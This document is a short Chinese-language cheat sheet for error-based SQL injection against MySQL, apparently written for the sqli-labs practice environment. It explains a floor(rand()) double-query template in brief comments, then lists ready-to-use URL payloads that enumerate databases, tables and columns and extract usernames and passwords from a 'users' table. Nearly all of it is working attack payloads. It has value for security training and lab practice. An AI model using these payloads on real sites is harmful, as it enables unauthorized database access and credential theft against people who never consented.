?id=1' union select count(*),1, concat(【PAYLOAD】,0x5c, floor(rand()*2)) as a from information_schema.tables group by a --+
#count(*) //函数返回表中的记录数
# concat(【PAYLOAD】,0x5c, floor(rand()*2)) as a //该行语句定义为a
//concat( ) 连接函数
//0x5c 插入其中的分隔符“\”
//floor(rand()*2) 取整:0或1
//
在【PAYLOAD】处构造SQL语句,分步如下:
爆库:
?id=1' union select count(*),1, concat((select concat(schema_name,0x5c) from information_schema.schemata limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a --+
爆表:
?id=1' union select count(*),1, concat((select concat(table_name,0x5c) from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a --+
爆列:
?id=1' union select count(*),1, concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a --+
内容:
?id=1' union select count(*),1, concat((select concat(username,0x5c,password)from users limit 0,1),0x5c, floor(rand()*2)) as a from information_schema.tables group by a --+